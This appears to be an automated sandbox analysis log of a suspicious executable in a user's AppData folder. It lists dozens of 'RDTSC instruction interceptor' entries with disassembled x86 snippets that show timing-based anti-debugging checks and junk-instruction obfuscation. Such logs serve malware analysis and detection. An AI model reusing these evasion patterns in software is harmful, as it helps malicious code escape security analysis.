Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C991A9 second address: C991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C91808 second address: C9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0E94F51A4Ch 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F0E94F51A48h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007F0E94F51A4Ch 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007F0E94F51A48h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007F0E94F51A4Ch 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9189B second address: C918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9730C second address: C97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C97310 second address: C97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C97314 second address: C9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9731A second address: C973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E948C9FB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0E948C9FB8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F0E948C9FB8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007F0E948C9FBFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007F0E948C9FBCh 0x0000006d je 00007F0E948C9FBCh 0x00000073 je 00007F0E948C9FB6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007F0E948C9FB8h 0x00000083 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C973BE second address: C973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A51h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C973D3 second address: C973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9E40E second address: C9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9E42C second address: C9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FBEh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3E469 second address: C3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3E470 second address: C3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3E47B second address: C3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CA21BD second address: CA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CA68FF second address: CA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CA9009 second address: CA9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F0E948C9FC6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CA9044 second address: CA9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C32AD2 second address: C32AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD183 second address: CAD193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0E94F51A46h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8AC second address: CAD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8B0 second address: CAD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8B4 second address: CAD8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E948C9FBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8CA second address: CAD8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8D0 second address: CAD8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8D4 second address: CAD8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8D8 second address: CAD8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CAD8E6 second address: CAD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C3C9D4 second address: C3C9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C813FE second address: C814C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov ecx, edi 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0E94F51A48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub di, DF1Bh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007F0E94F51A56h 0x0000003c mov dword ptr [ebp+1249606Ch], esp 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F0E94F51A48h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or edx, dword ptr [ebp+122D3966h] 0x00000062 cmp dword ptr [ebp+122D3A7Ah], 00000000h 0x00000069 jne 00007F0E94F51B3Ch 0x0000006f mov byte ptr [ebp+122D1CCBh], 00000047h 0x00000076 jc 00007F0E94F51A4Bh 0x0000007c mov edi, 0105AA21h 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007F0E94F51A4Fh 0x0000008b mov dword ptr [ebp+122D1C3Ch], ecx 0x00000091 pop edx 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jne 00007F0E94F51A48h 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C81BF9 second address: C81BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C81BFF second address: C81C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C820A1 second address: C820C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0E948C9FC1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F0E948C9FB6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C820C7 second address: C820D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C820D6 second address: C820DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C82520 second address: C82524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C82524 second address: C8252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C8252A second address: C82534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C825BD second address: C825C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C825C1 second address: C8268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E94F51A5Fh 0x0000000c jmp 00007F0E94F51A59h 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0E94F51A48h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+12482FD4h] 0x00000033 lea eax, dword ptr [ebp+12496058h] 0x00000039 jnl 00007F0E94F51A60h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 jmp 00007F0E94F51A59h 0x00000047 pop eax 0x00000048 jc 00007F0E94F51A48h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F0E94F51A55h 0x00000059 jl 00007F0E94F51A46h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F0E94F51A52h 0x00000067 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C8268A second address: C826EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0E948C9FB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D235Ch], edi 0x00000028 lea eax, dword ptr [ebp+12496014h] 0x0000002e mov edx, dword ptr [ebp+122D38F2h] 0x00000034 nop 0x00000035 ja 00007F0E948C9FD3h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C826EA second address: C826EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBA897 second address: CBA8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBA8A0 second address: CBA8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBA8AA second address: CBA8B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBA8B4 second address: CBA8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBA8BC second address: CBA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBA8C0 second address: CBA8F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0E94F51A58h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007F0E94F51A4Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F0E94F51A46h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC10DD second address: CC10EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC10EE second address: CC10FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBFAB3 second address: CBFAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0E948C9FB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBFAC5 second address: CBFAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBFAD0 second address: CBFAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0E948C9FB6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBFAEB second address: CBFB03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E94F51A4Eh 0x00000008 jp 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBFF5C second address: CBFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CBFF62 second address: CBFF8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E94F51A52h 0x0000000f jnc 00007F0E94F51A46h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC0235 second address: CC023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC04E1 second address: CC0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jng 00007F0E94F51A46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC0503 second address: CC0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC0AA0 second address: CC0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6BFA second address: CC6C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6C04 second address: CC6C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 jns 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 push ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F0E94F51A4Dh 0x00000022 jng 00007F0E94F51A46h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC59F2 second address: CC59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC59F6 second address: CC59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC59FF second address: CC5A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B52 second address: CC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F0E94F51A46h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B60 second address: CC5B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B64 second address: CC5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B6E second address: CC5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B74 second address: CC5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B78 second address: CC5B86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5B86 second address: CC5B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5E4A second address: CC5E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC5FAB second address: CC5FB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0E94F51A48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6412 second address: CC6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F0E948C9FB6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6422 second address: CC6427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6427 second address: CC6431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E948C9FC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: CC6431 second address: CC6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
